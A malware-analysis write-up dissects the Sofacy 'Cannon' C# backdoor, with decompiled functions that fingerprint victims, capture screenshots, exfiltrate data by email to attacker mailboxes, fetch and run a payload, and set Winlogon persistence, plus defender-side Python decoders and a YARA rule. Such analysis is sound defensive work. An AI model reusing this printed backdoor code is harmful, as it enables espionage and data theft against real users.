Let’s Learn: In-Depth on Sofacy Cannon Loader/Backdoor Review

Goal: Review and practice analyzing C# code from the Sofacy Group new loader/backdoor called “Cannon” (as discovered by Palo Alto Unit 42 researchers).

Source:

Sofacy “Cannon” Loader/Backdoor
SHA256: 61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e
Outline:

I. Background & Summary
II. Cannon Classes
III. Cannon "Form1" Main Functions
A. “start_Tick”
B. “inf_Tick”
C. “txt_Tick”
D. “subject_Tick”
E. "run_Tick"
F. “load_Tick”
G. “screen_Tick”
H. "eTim_Tick"
IV. Yara Signature
I. Background & Summary
Before diving deeper, I highly recommend reading the original discovery and excellent research related to the “Cannon” malware by Palo Alto Unit 42, titled “Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan.” As reported by Unit 42, the Sofacy group leveraged a malicious Microsoft Word document themed around the “Lion Air disaster” to deliver the Cannon malware. By and large, according to Palo Alto Unit 42, Sofacy’s recent targeting includes “government organizations in the EU, US, and former Soviet states.”
Cannon is a rather simple but interesting C#-coded malware that collects victim information, receives commands (controlled by EventHandler timers), and retrieves the next stage via SMTPS and POP3S. It is interesting that the malware’s original project “wsslc” program database (PDB) is associated with the possible user “Garry” and the “cannon” project path “C:\Users\Garry\Desktop\cannon\obj\x86\Debug\wsslc.pdb”. Notably, “Garry” is a common way for Russian speakers to phonetically spell out “Harry”, stressing the “G” sound. The malware logic also checks control email messages for attachment files containing “auddevc” via its “load_Tick” function, possibly retrieving unidentified additional binaries. If found, the malware creates a file stream in the main directory and writes the file to the directory using BinaryWriter. Additionally, the malware creates a registry entry named “Shell” under “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon” for registry persistence.
It is also interesting that the malware authors chose to leverage the Czech email provider @post.cz for communications and command and control.
II. Cannon Classes
The binary contains the following five classes:
Class Name Description
AUTH Initializes values for SMTPS and POP connection mF1, p1, mF2, p2, mF3, and p3
Form1 Loads the main functions and initializes the main flow of the binary
Lenor Loads auxiliary functions, retrieves information about victims and parses emails for commands
MDat Initializes values used for network communication
Program Starts the program and passes control to Form1
The program starts in the Main function, which checks whether the file “C:\Users\Public\Music\s.txt” exists; if it does, it starts “explorer.exe”. It then calls EnableVisualStyles() and SetCompatibleTextRenderingDefault(defaultValue: false) and launches Application.Run, which executes the “Form1” class.
The full function is as follows:

////////////////////////////////////////////////////////////////////
////////////////////// Cannon Malware Main "Program" ///////////////
////////////////////////////////////////////////////////////////////
internal static class Program
{
[STAThread]
private static void Main()
{
try
{
if (File.Exists("C:\\Users\\Public\\Music\\s.txt"))
{
Process.Start("explorer.exe");
}
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(defaultValue: false);
Application.Run(new Form1());
}
catch (Exception)
{
}
}
}

III. Cannon “Form1” Main Functions
Next, the class “Form1” starts with InitializeComponent(), which sets up all the variables and intervals with EventHandler for the main functions as detailed by Unit 42:

////////////////////////////////////////////////////////////////////
// Cannon Malware Sequence "Form1" Calls & Intervals //////////////
///////////////////////////////////////////////////////////////////
start.Interval = 1000;
start.Tick += new System.EventHandler(start_Tick);
inf.Interval = 300000;
inf.Tick += new System.EventHandler(inf_Tick);
txt.Interval = 120000;
txt.Tick += new System.EventHandler(txt_Tick);
subject.Interval = 120000;
subject.Tick += new System.EventHandler(subject_Tick);
run.Interval = 60000;
run.Tick += new System.EventHandler(run_Tick);
load.Interval = 120000;
load.Tick += new System.EventHandler(load_Tick);
screen.Interval = 10000;
screen.Tick += new System.EventHandler(screen_Tick);
eTim.Interval = 13000;
eTim.Tick += new System.EventHandler(eTim_Tick);

A. “start_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "start_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void start_Tick(object sender, EventArgs e)
{
try
{
start.Enabled = false;
Lenor lenor = new Lenor();
if (Directory.Exists("C:\\Users\\Public\\Music"))
{
dir = "C:\\Users\\Public\\Music" + "\\";
}
else
{
dir = "C:\\Documents and Settings\\All Users\\Documents" + "\\";
}
att = dir + "auddevc.txt";
_id = lenor.id(dir);
if (!File.Exists(dir + "s.txt"))
{
lenor.Dir = dir;
lenor.Registration("\"HKCU\\Software\\Microsoft\\" +
"Windows NT\\CurrentVersion\\Winlogon\", "Shell");
File.WriteAllText(dir + "s.txt", "{SysPar = 65}");
}
inf.Enabled = true;
}
catch (Exception)
{
}
}

The “start_Tick” function fires once its interval of 1000 milliseconds (1 second) elapses and immediately disables its own timer. The function checks whether the directory “C:\Users\Public\Music” exists; if not, it uses “C:\Documents and Settings\All Users\Documents” instead.
Then, it builds the attachment path by appending the filename “auddevc.txt” to the directory. The function generates a bot ID (_id) via the id function of the “Lenor” class (which calls another “SN” function from Lenor). The bot ID is generated by concatenating the output of the “vol C:” cmd command (the volume serial number) with the machine username “Environment.UserName”, the latter rendered as hex via BitConverter.ToString. More specifically, “Lenor.SN” runs a command such as “vol C:>>C:\Documents and Settings\All Users\Documents\99.txt”, saving the output to the local file “99.txt”; the command is run via the batch script “b.bat”, and both files are removed right after the operation.

The “Lenor.id” function simply calls SN and concatenates the full bot ID.

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "Id" Bot ID Generation /////////////
////////////////////////////////////////////////////////////////////
// Builds the bot ID: volume serial number of C: followed by the hex-encoded username.
// The decompiler had inlined the directory argument; it is restored here as parameter d.
public string id(string d)
{
string volumename = SN(d, "C");
volumename = volumename.Trim();
string username = Environment.UserName;
byte[] bytes = Encoding.Default.GetBytes(username);
string text4 = BitConverter.ToString(bytes); // e.g. "47-61-72-72-79"
username = text4.Replace("-", "");
string full_id = volumename + username;
return full_id;
}

// Runs "vol C:" through a hidden batch file, reads the redirected output from 99.txt,
// and extracts the serial number; both helper files are deleted afterwards.
public string SN(string d, string name)
{
string text = "";
try
{
while (!File.Exists(d + "\\99.txt"))
{
try
{
string contents = "vol " + name + ":>>" + d + "\\99.txt";
File.WriteAllText(d + "\\b.bat", contents);
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = d + "\\b.bat";
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(processStartInfo);
File.Delete(d + "\\b.bat");
}
catch (Exception)
{
}
}
text = File.ReadAllText(d + "\\99.txt");
string[] array = text.Split('\n');
text = array[1]; // second line: " Volume Serial Number is XXXX-XXXX"
text = text.Substring(text.LastIndexOf(" "));
text = text.Remove(text.IndexOf('-'), 1);
File.Delete(d + "\\99.txt");
}
catch (Exception)
{
}
return text;
}

For persistence, the malware checks whether the directory contains the “s.txt” file. If not, it registers itself in the following registry path:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

It also creates the file “s.txt” in the same local directory, containing the string “{SysPar = 65}”.
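To make the bot ID format concrete, here is an added Python example (my own code, not the malware's) that mirrors the “Lenor.SN” parsing of the vol output and the “Lenor.id” concatenation, and then decodes a bot ID back into its serial number and username. That is handy when triaging mail-server logs for the subject lines this sample uses. The vol output below is constructed, and the username encoding is assumed to be cp1252, which is what Encoding.Default yields on a Western Windows install.

```python
# Added example: reconstruct and decode the Cannon bot ID. Not the malware's code.

HEX_DIGITS = set("0123456789abcdefABCDEF")

# Constructed sample of `vol C:` output as cmd.exe prints it (CRLF line endings).
SAMPLE_VOL_OUTPUT = (
    " Volume in drive C has no label.\r\n"
    " Volume Serial Number is 1A2B-3C4D\r\n"
)


def serial_from_vol_output(text: str) -> str:
    """Mirror Lenor.SN: take the second line, keep everything from the last
    space onwards, and drop the first dash. Lenor.id then calls Trim(),
    so the result is stripped here as well."""
    lines = text.split("\n")             # C# text.Split('\n'): the "\r" stays on each line
    if len(lines) < 2:
        raise ValueError("vol output shorter than expected")
    line = lines[1]
    serial = line[line.rfind(" "):]      # C# Substring(LastIndexOf(" "))
    serial = serial.replace("-", "", 1)  # C# Remove(IndexOf('-'), 1)
    return serial.strip()


def make_bot_id(volume_serial: str, username: str, codepage: str = "cp1252") -> str:
    """Mirror Lenor.id: serial + BitConverter.ToString(bytes of username) with the
    dashes removed, i.e. upper-case hex of the username bytes.
    Encoding.Default is assumed to be cp1252 (assumption, not stated on the page)."""
    hex_user = username.encode(codepage).hex().upper()
    return volume_serial + hex_user


def parse_bot_id(subject: str, codepage: str = "cp1252") -> tuple:
    """Split a Cannon mail subject into (volume serial, username).
    The serial is 8 hex digits once the dash is removed; the rest is the hex username."""
    if len(subject) < 8 or len(subject) % 2 != 0:
        raise ValueError("not a well-formed Cannon bot ID")
    if any(c not in HEX_DIGITS for c in subject):
        raise ValueError("bot ID contains non-hex characters")
    serial, hex_user = subject[:8], subject[8:]
    return serial, bytes.fromhex(hex_user).decode(codepage)


def looks_like_bot_id(subject: str) -> bool:
    """Heuristic for scanning mail logs: well-formed and decodes to a printable username."""
    try:
        _, user = parse_bot_id(subject)
    except ValueError:          # UnicodeDecodeError is a ValueError as well
        return False
    return len(user) > 0 and user.isprintable()


if __name__ == "__main__":
    serial = serial_from_vol_output(SAMPLE_VOL_OUTPUT)
    bot_id = make_bot_id(serial, "Garry")
    print(bot_id, parse_bot_id(bot_id), looks_like_bot_id(bot_id))
```

Because the serial number is always eight hex digits after the dash is removed, the split point inside the subject is fixed, which is what makes the decoding deterministic without any delimiter.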
B. “inf_Tick” 

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "inf_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void inf_Tick(object sender, EventArgs e)
{
try
{
inf.Enabled = false;
string[] array = "REDACTED_PASS2|bishtr.cam47".Split('|');
a1 = array[1];
b1 = array[0];
array = "REDACTED_PASS3|cervot.woprov".Split('|');
a2 = array[1];
b2 = array[0];
array = "REDACTED_PASS4|lobrek.chizh".Split('|');
a3 = array[1];
b3 = array[0];
Lenor lenor = new Lenor();
lenor.Dir = dir;
File.Delete(dir + "\\b.bat");
string userName = Environment.UserName;
lenor.inf(dir + "i.ini", userName);
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "i.ini"; //filename attachement
mDat.ID = _id; //subject
mDat.bod = "S_inf"; // body
mDat.mT = "sahro.bella7"; // to
AUTH aUTH = new AUTH();
aUTH.mF1 = a1; // from bishtr.cam47
aUTH.p1 = b1; // REDACTED_PASS2
aUTH.mF2 = a2; // from cervot.woprov
aUTH.p2 = b2; // REDACTED_PASS3
aUTH.mF3 = a3; // from lobrek.chizh
aUTH.p3 = b3; // REDACTED_PASS4
lenor.sent(mDat, aUTH);
screen.Enabled = true;
}
catch (Exception)
{
screen.Enabled = true;
}
}

The “inf_Tick” function is launched with the interval of 30000 milliseconds or 30 seconds. The function splits strings on the “|” separator, for example “REDACTED_PASS2|bishtr.cam47”.Split(‘|’), and stores the values as usernames and passwords in the authentication “AUTH” class.
Additionally, it deletes the batch file “b.bat” from the current directory. 
The malware “lenor.inf” function works as follows:

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "inf" Function Fragment /////////////
////////////////////////////////////////////////////////////////////
public string inf(string fn, string CurU)
{
string text = "";
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendFormat("RPlace:\n" + Environment.NewLine);
stringBuilder.AppendFormat("{0} \n", Application.ExecutablePath + Environment.NewLine);
stringBuilder.AppendFormat("===================================================================================\n"
+ Environment.NewLine);
stringBuilder.AppendFormat("OS: {0}\n", Environment.OSVersion + Environment.NewLine);
stringBuilder.AppendFormat("SDir: {0}\n", SDir() + Environment.NewLine);
stringBuilder.AppendFormat("Domain: {0}\n", Domain() + Environment.NewLine);
stringBuilder.AppendFormat("Host: {0}\n", HostN() + Environment.NewLine);
stringBuilder.AppendFormat("CurrentUsr: {0}\n", CurU + Environment.NewLine);
stringBuilder.AppendFormat("TimeZ: {0}\n", GetTZ() + Environment.NewLine);
stringBuilder.AppendFormat("Working: {0}\n", TimeWork() + Environment.NewLine);
stringBuilder.AppendFormat("===================================================================================\n"
+ Environment.NewLine);
stringBuilder.AppendFormat("\n" + DrvDsk() + Environment.NewLine);
stringBuilder.AppendFormat("===================================================================================\n"
+ Environment.NewLine);
stringBuilder.AppendFormat("Swr:\n" + Environment.NewLine);
text = "C:\\Program";
string[] directories = Directory.GetDirectories(text + " Files\\");
string[] array = directories;
foreach (string str in array)
{
stringBuilder.AppendFormat("{0}\n", str + Environment.NewLine);
}
if (Directory.Exists(text + " Files (x86)\\"))
{
directories = Directory.GetDirectories(text + " Files (x86)\\");
array = directories;
foreach (string str in array)
{
stringBuilder.AppendFormat("{0}\n", str + Environment.NewLine);
}
}
stringBuilder.AppendFormat("===================================================================================\n"
+ Environment.NewLine);
stringBuilder.AppendFormat("PrL:\n" + Environment.NewLine);

The malware uses the “Lenor.inf” function to write the collected victim information to the file “i.ini” in the same directory, in the following structure (example):


The function attempts to authenticate to the three @post.cz email addresses (“bishtr.cam47@post.cz”, “cervot.woprov@post.cz”, “lobrek.chizh@post.cz”) and sends the information to “sahro.bella7@post.cz” with the body message “S_inf”, the file attachment “i.ini”, and the bot ID as the subject.
C. “txt_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "txt_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void txt_Tick(object sender, EventArgs e)
{
try
{
txt.Enabled = false;
string[] array = "REDACTED_PASSWORD|trala.cosh2".Split('|');
ai = array[1];
bi = array[0];
Lenor lenor = new Lenor();
_adr = lenor.pi(_id, "trala.cosh2" + "@post.cz", bi, "pop.seznam.cz");
if (_adr.Length > 0)
{
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "s.txt";
mDat.ID = _id;
mDat.bod = "ok";
mDat.mT = "sahro.bella7";
AUTH aUTH = new AUTH();
aUTH.mF1 = a1;
aUTH.p1 = b1;
aUTH.mF2 = a2;
aUTH.p2 = b2;
aUTH.mF3 = a3;
aUTH.p3 = b3;
lenor.sent(mDat, aUTH);
load.Enabled = true;
}
else
{
txt.Enabled = true;
}
}
catch (Exception)
{
load.Enabled = true;
}
}

The “txt_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds. The function sets up variables and splits the username and password on “|” as follows:
“REDACTED_PASS|trala.cosh2”.
The function “lenor.pi” authenticates to the email account “trala.cosh2@post.cz”, retrieves the message count via pop3Client.GetMessageCount(), and loops over the messages looking for a subject equal to the bot ID (message.Headers.Subject == ID). For a match it reads the message body (message.MessagePart.Body), converts it to a string with BitConverter.ToString(body), decodes the hex via FromHex(text), and deletes the message.
The loop code is as follows:

/////////////////////////////////////////////////////////////////////
// Cannon Malware "txt_Tick" Command Email GetMessage Loop for cmd //
////////////////////////////////////////////////////////////////////
for (int i = 0; i < pop3Client.GetMessageCount(); i++)
{
message = pop3Client.GetMessage(i + 1);
if (message.Headers.Subject == ID)
{
byte[] body = message.MessagePart.Body;
text = BitConverter.ToString(body);
text = FromHex(text);
pop3Client.DeleteMessage(i + 1);
}
}

If the returned text has a length greater than zero, the function attempts to authenticate to the two aforementioned @post.cz email addresses from “screen_Tick” and sends the information to “sahro.bella7@post.cz” with the body message “ok”, the file attachment “s.txt”, and the bot ID as the subject.
D. “subject_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "subject_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void subject_Tick(object sender, EventArgs e)
{
try
{
subject.Enabled = false;
Lenor lenor = new Lenor();
lenor.Dir = dir;
rn = lenor.pi(_id, "trala.cosh2" + "@post.cz", bi, "pop.seznam.cz");
rn = rn.Trim();
if (rn.Length > 0)
{
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "s.txt";
mDat.ID = _id;
mDat.bod = "ok3";
mDat.mT = "sahro.bella7";
AUTH aUTH = new AUTH();
aUTH.mF1 = a1;
aUTH.p1 = b1;
aUTH.mF2 = a2;
aUTH.p2 = b2;
aUTH.mF3 = a3;
aUTH.p3 = b3;
lenor.sent(mDat, aUTH);
run.Enabled = true;
}
else
{
subject.Enabled = true;
}
}
catch (Exception)
{
}
}

The “subject_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds. The function sets up variables and splits the username and password on “|” as follows:
“REDACTED_PASS|trala.cosh2”
If the returned text, trimmed of leading and trailing whitespace, has a length greater than zero, the function attempts to authenticate to the two aforementioned @post.cz email addresses from “screen_Tick” and sends the information to “sahro.bella7@post.cz” with the body message “ok3”, the file attachment “s.txt”, and the bot ID as the subject.

E. “run_Tick”
/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "run_Tick" function /////////////////
////////////////////////////////////////////////////////////////////
private void run_Tick(object sender, EventArgs e)
{
try
{
run.Enabled = false;
try
{
Directory.CreateDirectory(rn.Substring(0, rn.LastIndexOf("\\")));
}
catch (Exception)
{
}
File.Move(att, rn);
if (File.Exists(rn))
{
Lenor lenor = new Lenor();
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "l.txt";
mDat.ID = _id;
mDat.bod = "ok4";
mDat.mT = "sahro.bella7";
AUTH aUTH = new AUTH();
aUTH.mF1 = a1;
aUTH.p1 = b1;
aUTH.mF2 = a2;
aUTH.p2 = b2;
aUTH.mF3 = a3;
aUTH.p3 = b3;
lenor.sent(mDat, aUTH);
Process.Start(rn);
Process[] processes = Process.GetProcesses();
Process[] array = processes;
foreach (Process process in array)
{
if (process.ProcessName.Contains("auddevc"))
{
Lenor lenor2 = new Lenor();
MDat mDat2 = new MDat();
mDat2.Dom = "@post.cz";
mDat2.Host = "smtp.seznam.cz";
mDat2.fn = dir + "s.txt";
mDat2.ID = _id;
mDat2.bod = "ok5";
mDat2.mT = "sahro.bella7";
AUTH aUTH2 = new AUTH();
aUTH2.mF1 = a1;
aUTH2.p1 = b1;
aUTH2.mF2 = a2;
aUTH2.p2 = b2;
aUTH2.mF3 = a3;
aUTH2.p3 = b3;
lenor2.sent(mDat2, aUTH2);
File.Delete(dir + "sysscr.ops");
File.Delete(dir + "i.ini");
Application.Exit();
}
}
}
else
{
Application.Restart();
}
}
catch (Exception)
{
Application.Exit();
}
}
The “run_Tick” function is launched with the interval of 60000 milliseconds or 60 seconds. The function processes the text returned by the “subject_Tick” command and creates the directory of that path.
Then, if successful, it attempts to move the file “auddevc.txt” to the new path via File.Move(att, rn), where att is dir + “auddevc.txt”.
If successful, the function attempts to authenticate to the two aforementioned @post.cz email addresses and sends the information to “sahro.bella7@post.cz” with the body message “ok4”, the file attachment “l.txt”, and the bot ID as the subject.
Additionally, the function checks whether any running process name contains “auddevc”; if so, the function attempts to authenticate to the two aforementioned @post.cz email addresses and sends the information to “sahro.bella7@post.cz” with the body message “ok5”, the file attachment “s.txt”, and the bot ID as the subject.
The function is also responsible for deleting the saved screenshot “sysscr.ops” and the collected victim information file “i.ini”. The function also exits the application if successful.
F. “load_Tick”
/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "load_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void load_Tick(object sender, EventArgs e)
{
try
{
load.Enabled = false;
string text = _adr.Replace("B&", "");
text = text.Replace("Db", "");
string[] array = text.Split('%');
string text2 = array[0];
string text3 = array[1];
text2 = text2.Trim();
text3 = text3.Trim();
Lenor lenor = new Lenor();
lenor.Dir = dir;
File.WriteAllText(dir + "l.txt", "090");
rn = lenor.piatt(_id, text3 + "@post.cz", text2, "pop.seznam.cz");
if (File.Exists(att))
{
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "l.txt";
mDat.ID = _id;
mDat.bod = "ok2";
mDat.mT = "sahro.bella7";
AUTH aUTH = new AUTH();
aUTH.mF1 = a1;
aUTH.p1 = b1;
aUTH.mF2 = a2;
aUTH.p2 = b2;
aUTH.mF3 = a3;
aUTH.p3 = b3;
lenor.sent(mDat, aUTH);
subject.Enabled = true;
}
else
{
load.Enabled = true;
}
}
catch (Exception)
{
}
}
The “load_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds. The function is responsible for processing the text retrieved by the “txt_Tick” function. It replaces “B&” with “” and “Db” with “”, then splits the text on ‘%’ and removes leading and trailing whitespace from both parts.
Then, it writes the new file “l.txt” in the same directory, containing the string “090”.
The function “lenor.piatt” authenticates to the email account “trala.cosh@post.cz”, retrieves the message count via pop3Client.GetMessageCount(), and loops over the messages looking for a subject equal to the bot ID (message.Headers.Subject == ID). For a match it reads the raw message (message.RawMessage), converts it to a string with BitConverter.ToString(rawMessage), and decodes the hex via FromHex(text). Then it loops over the attachments looking for file names containing “auddevc”. If found, it creates a file stream in the same directory and writes the attachment to disk using BinaryWriter.
/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "piatt" function fragment ///////////
////////////////////////////////////////////////////////////////////
if (pop3Client.GetMessageCount() > 0)
{
for (int i = 0; i < pop3Client.GetMessageCount(); i++)
{
message = pop3Client.GetMessage(i + 1);
if (message.Headers.Subject == ID)
{
byte[] rawMessage = message.RawMessage;
text = BitConverter.ToString(rawMessage);
text = FromHex(text);
list = message.FindAllAttachments();
foreach (MessagePart item in list)
{
if (item.FileName.Contains("auddevc"))
{
FileStream fileStream = new FileStream(Dir + item.FileName, FileMode.Create);
BinaryWriter binaryWriter = new BinaryWriter(fileStream);
binaryWriter.Write(item.Body);
binaryWriter.Close();
fileStream.Close();
}
}
pop3Client.DeleteMessage(i + 1);
}
}
}
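Since the command path goes body bytes, BitConverter.ToString, FromHex, and then the “B&”/“Db”/‘%’ parsing in load_Tick, here is an added Python decoder (my own code, not the malware's) that walks the same steps over a captured message body so an analyst can see which mailbox a command mail pointed the bot at. The sample body is constructed with placeholder values; FromHex is not shown on the page, so it is assumed to simply reverse BitConverter.ToString and decode with the default code page.

```python
# Added example: decode a Cannon command-mail body and parse it the way load_Tick does.
# Not the malware's code; FromHex is assumed to simply reverse BitConverter.ToString.


def from_bitconverter_hex(text: str, codepage: str = "cp1252") -> str:
    """Reverse BitConverter.ToString(): "6F-6B" -> "ok".
    Assumption: the malware's FromHex does the same and decodes with the default code page."""
    cleaned = text.replace("-", "").strip()
    if not cleaned:
        return ""
    return bytes.fromhex(cleaned).decode(codepage)


def to_bitconverter_hex(data: bytes) -> str:
    """Render bytes as BitConverter.ToString() does, for building test input."""
    return "-".join(f"{b:02X}" for b in data)


def parse_load_command(adr: str) -> dict:
    """Mirror load_Tick: strip the "B&" and "Db" markers, split on "%", trim both halves.
    array[0] is passed as the password and array[1] as the mailbox name to lenor.piatt."""
    text = adr.replace("B&", "").replace("Db", "")
    parts = text.split("%")
    if len(parts) < 2:
        # The malware would hit an IndexOutOfRangeException here, swallowed by its catch block,
        # which leaves the load timer disabled.
        raise ValueError("command text lacks the '%' separator")
    password, account = parts[0].strip(), parts[1].strip()
    return {
        "password": password,
        "account": account,
        "mailbox": account + "@post.cz",
        "pop_host": "pop.seznam.cz",
    }


def decode_command_mail(body: bytes) -> dict:
    """Full path: raw body bytes -> BitConverter string -> FromHex -> load_Tick parse."""
    return parse_load_command(from_bitconverter_hex(to_bitconverter_hex(body)))


# Constructed sample: the password and account are placeholders, not values from the sample.
SAMPLE_BODY = b"B& exampl3-pass %Db ficti.acct7 "


if __name__ == "__main__":
    print(decode_command_mail(SAMPLE_BODY))
```

Note that the marker removal is a blind string replace, so an account name that happens to contain “Db” would be mangled by the malware itself; the decoder reproduces that behaviour rather than hiding it.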

G. “screen_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "screen_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void screen_Tick(object sender, EventArgs e)
{
try
{
screen.Enabled = false;
string[] array = "REDACTED_PASS2|bishtr.cam47".Split('|');
a1 = array[1];
b1 = array[0];
array = "REDACTED_PASS3|cervot.woprov".Split('|');
a2 = array[1];
b2 = array[0];
array = "REDACTED_PASS4|lobrek.chizh".Split('|');
a3 = array[1];
b3 = array[0];
Lenor lenor = new Lenor();
lenor.Dir = dir;
lenor.scr();
MDat mDat = new MDat();
mDat.Dom = "@post.cz";
mDat.Host = "smtp.seznam.cz";
mDat.fn = dir + "sysscr.ops";
mDat.ID = _id;
mDat.bod = "SCreen";
mDat.mT = "sahro.bella7";
AUTH aUTH = new AUTH();
aUTH.mF1 = a1;
aUTH.p1 = b1;
aUTH.mF2 = a2;
aUTH.p2 = b2;
aUTH.mF3 = a3;
aUTH.p3 = b3;
lenor.sent(mDat, aUTH);
txt.Enabled = true;
}
catch (Exception)
{
txt.Enabled = true;
}
}

The “screen_Tick” function is launched with the interval of 10000 milliseconds or 10 seconds. The function sets up variables and splits usernames and passwords leveraging “|” as follows:

REDACTED_PASS2|bishtr.cam47
REDACTED_PASS3|cervot.woprov
REDACTED_PASS4|lobrek.chizh

Then, it leverages the screen function “lenor.scr” taking a desktop screenshot via Bitmap(bounds.Width, bounds.Height), Graphics.FromImage(bitmap), graphics.CopyFromScreen(Point.Empty, Point.Empty, bounds.Size) and saving the screenshot as “.png” image masked as “sysscr.ops” in the main directory.
The function attempts to authenticate to the two aforementioned @post.cz email addresses and sends the information to “sahro.bella7@post.cz” with the body message “SCreen”, the file attachment “sysscr.ops”, and the bot ID as the subject.
H. “eTim_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "eTim_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void eTim_Tick(object sender, EventArgs e)
{
Application.Exit();
File.Delete(dir + "\\r.bat");
}

The “eTim_Tick” function is launched with the interval of 13000 milliseconds or 13 seconds.
The function simply exits the application and deletes the batch script “r.bat” in the directory.
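Putting the timer hand-offs together: each Tick handler disables its own timer and enables the next one, so the Interval values from InitializeComponent add up to a minimum time before each stage can run. The added Python model below (my own code, not the malware's) encodes the success-path chain read from the “Enabled = true” assignments in the handlers above and computes that timeline; eTim is left out because no handler shown on the page enables it, and txt, load and subject re-arm themselves until the mailbox yields something, so real dwell times are longer than this floor.

```python
# Added example: model of the Cannon timer chain, derived from the Interval values in
# InitializeComponent and the "<timer>.Enabled = true" hand-offs in the Tick functions.
# Not the malware's code. Only the success path is modelled.
from collections import OrderedDict

# timer name -> (interval in ms, timer enabled on the success path)
CHAIN = OrderedDict([
    ("start",   (1000,   "inf")),      # start_Tick enables inf
    ("inf",     (300000, "screen")),   # inf_Tick enables screen (in both branches)
    ("screen",  (10000,  "txt")),      # screen_Tick enables txt
    ("txt",     (120000, "load")),     # txt_Tick enables load once a command arrives
    ("load",    (120000, "subject")),  # load_Tick enables subject once the attachment lands
    ("subject", (120000, "run")),      # subject_Tick enables run once a path arrives
    ("run",     (60000,  None)),       # run_Tick launches the payload and exits
])


def stage_timeline(chain=CHAIN, first="start") -> list:
    """Walk the hand-offs and return (timer, fires_at_seconds) for each stage in order."""
    timeline, elapsed_ms, current = [], 0, first
    seen = set()
    while current is not None:
        if current in seen:
            raise ValueError(f"cycle at timer {current!r}")
        seen.add(current)
        interval_ms, next_timer = chain[current]
        elapsed_ms += interval_ms
        timeline.append((current, elapsed_ms / 1000))
        current = next_timer
    return timeline


def minimum_seconds_to(timer: str, chain=CHAIN) -> float:
    """Earliest point at which a given Tick handler can run, e.g. run_Tick (payload launch)."""
    for name, at in stage_timeline(chain):
        if name == timer:
            return at
    raise KeyError(timer)


if __name__ == "__main__":
    for name, at in stage_timeline():
        print(f"{name:8s} fires no earlier than {at:7.1f} s")
```

The practical takeaway is that a sandbox run shorter than about five minutes never even sees the first SMTPS beacon, and the payload launch in run_Tick cannot happen before roughly twelve minutes.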

IV. Yara Signature

rule apt_win32_cannon_loader_sofacy {
meta:
description = "Detects Sofacy Cannon Loader"
author = "@VK_Intel"
date = "2018-11-24"
hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
strings:

$pdb = "c:\\Users\\Garry\\Desktop\\cannon\\obj\\x86\\Debug\\wsslc.pdb" fullword ascii
$exe = "wsslc.exe" fullword ascii wide

$s0 = "cannon" fullword ascii wide
$s1 = "cannon.Form1.resources" fullword ascii wide
$s2 = "cannon.Properties.Resources.resources" fullword ascii wide

$c0 = "Form1" fullword ascii wide
$c1 = "Lenor" fullword ascii wide
$c2 = "MDat" fullword ascii wide
$c3 = "AUTH" fullword ascii wide
$c4 = "Program" fullword ascii wide

$f0 = "start_Tick" fullword ascii wide
$f1 = "inf_Tick" fullword ascii wide
$f2 = "screen_Tick" fullword ascii wide
$f3 = "txt_Tick" fullword ascii wide
$f4 = "load_Tick" fullword ascii wide
$f5 = "subject_Tick" fullword ascii wide
$f6 = "run_Tick" fullword ascii wide
$f7 = "eTim_Tick" fullword ascii wide

condition:
( uint16(0) == 0x5a4d and
filesize < 1000KB and
( 2 of ($c*) and 4 of ($f*) ) or ( 1 of ($s*) and ( $pdb or $exe ) )
) or ( all of them )
}

Let’s Learn: In-Depth Review of FIN7 VBA Macro & Lightweight JavaScript Backdoor

Goal: Review, analyze, and practice extracting FIN7 JavaScript backdoor from malicious Microsoft Office documents.

Source:

Microsoft Office First-Stage VBA Macro Documents:
SHA256: 6e1230088a34678726102353c622445e1f8b8b8c9ce1f025d11bfffd5017ca82
SHA256: f5f8ab9863dc12d04731b1932fc3609742de68252c706952f31894fc21746bb8
SHA256: 63ff5d9c9b33512f0d9f8d153c02065c637b7da48d2c0b6f7114deae6f6d88aa 
Obfuscated Lightweight JavaScript Backdoor
Deobfuscated Lightweight JavaScript Backdoor
Outline:

I. Background & Summary
II. Malicious Microsoft Word Document First-Stage Macro
III. Deobfuscated Lightweight JavaScript Backdoor
A. “main”
B. “crypt_controller”
C. “id”
D. “get_path”
E. “send_data”
IV. Yara Signature: Possible FIN7 First-Stage Microsoft Word Document
I. Background & Summary
